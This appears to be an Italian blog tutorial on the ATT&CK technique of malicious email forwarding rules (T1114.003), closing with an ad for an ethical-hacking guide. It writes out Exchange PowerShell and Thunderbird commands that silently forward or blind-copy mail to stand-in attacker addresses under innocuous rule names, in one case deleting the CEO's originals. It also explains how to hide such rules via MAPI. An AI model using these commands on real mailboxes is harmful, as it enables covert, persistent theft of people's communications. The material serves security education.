Intercettazione Email: Email Forwarding Rule (T1114.003)

Le regole di inoltro email rappresentano una delle tecniche più subdole per mantenere l'accesso persistente alle comunicazioni aziendali. Questa metodologia permette agli attaccanti di ricevere copie di tutte le email inviate a una vittima, anche dopo che le credenziali compromesse sono state reimpostate.

La tecnica si colloca nella fase di Collection (TA0009) della kill chain, quando l'avversario ha già stabilito un accesso e cerca di raccogliere informazioni sensibili per raggiungere i propri obiettivi. L'implementazione può avvenire attraverso client email locali, interfacce web o linea di comando, sfruttando le funzionalità legittime dei sistemi di posta.

Particolarmente insidiosa è la capacità di nascondere queste regole utilizzando le API MAPI di Microsoft, rendendole invisibili da Outlook, OWA e dalla maggior parte degli strumenti di amministrazione Exchange. 5 gruppi APT hanno dimostrato l'efficacia di questa tecnica in campagne documentate, inclusi attori sofisticati come Kimsuky e Star Blizzard.

Per comprendere la minaccia, iniziamo con la creazione di una regola di inoltro tramite PowerShell in ambiente Exchange. Il comando base è sorprendentemente semplice:

New-InboxRule -Name "Legitimate Rule" -ForwardTo "attacker@external.com" -StopProcessingRules $true

Questa singola riga crea una regola che inoltra tutte le email in arrivo all'indirizzo specificato. L'opzione StopProcessingRules impedisce l'elaborazione di altre regole successive, garantendo che l'inoltro avvenga sempre.

Per un approccio più sofisticato che replica le tattiche di LAPSUS$, possiamo creare regole di trasporto a livello tenant che intercettano tutte le comunicazioni dell'organizzazione:

New-TransportRule -Name "Compliance Archive" -SentToScope InOrganization -BlindCopyTo "monitor@attacker.com"

Questa regola opera a livello superiore rispetto alle regole mailbox individuali e può essere particolarmente difficile da individuare per utenti non amministratori.

Su sistemi Linux con Thunderbird, la manipolazione avviene modificando il file msgFilterRules.dat. Per automatizzare l'attacco, uno script bash può inserire regole di inoltro:

echo 'name="Forward All"
enabled="yes"
type="17"
action="Forward"
actionValue="attacker@external.com"' >> ~/.thunderbird/*/ImapMail/*/msgFilterRules.dat

Per nascondere la regola utilizzando MAPI, il metodo preferito da Star Blizzard, richiede l'uso di strumenti come MFCMAPI o EWSEditor. Questi permettono di modificare direttamente le proprietà PR_RULE_MSG_STATE e PR_RULE_MSG_PROVIDER, rendendo la regola invisibile alle interfacce standard.

L'automazione dell'attacco può includere la creazione di regole condizionali che si attivano solo per mittenti specifici, riducendo il rumore e aumentando la persistenza:

New-InboxRule -Name "Project Updates" -From "ceo@company.com" -ForwardTo "collector@attacker.com" -DeleteMessage $true

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo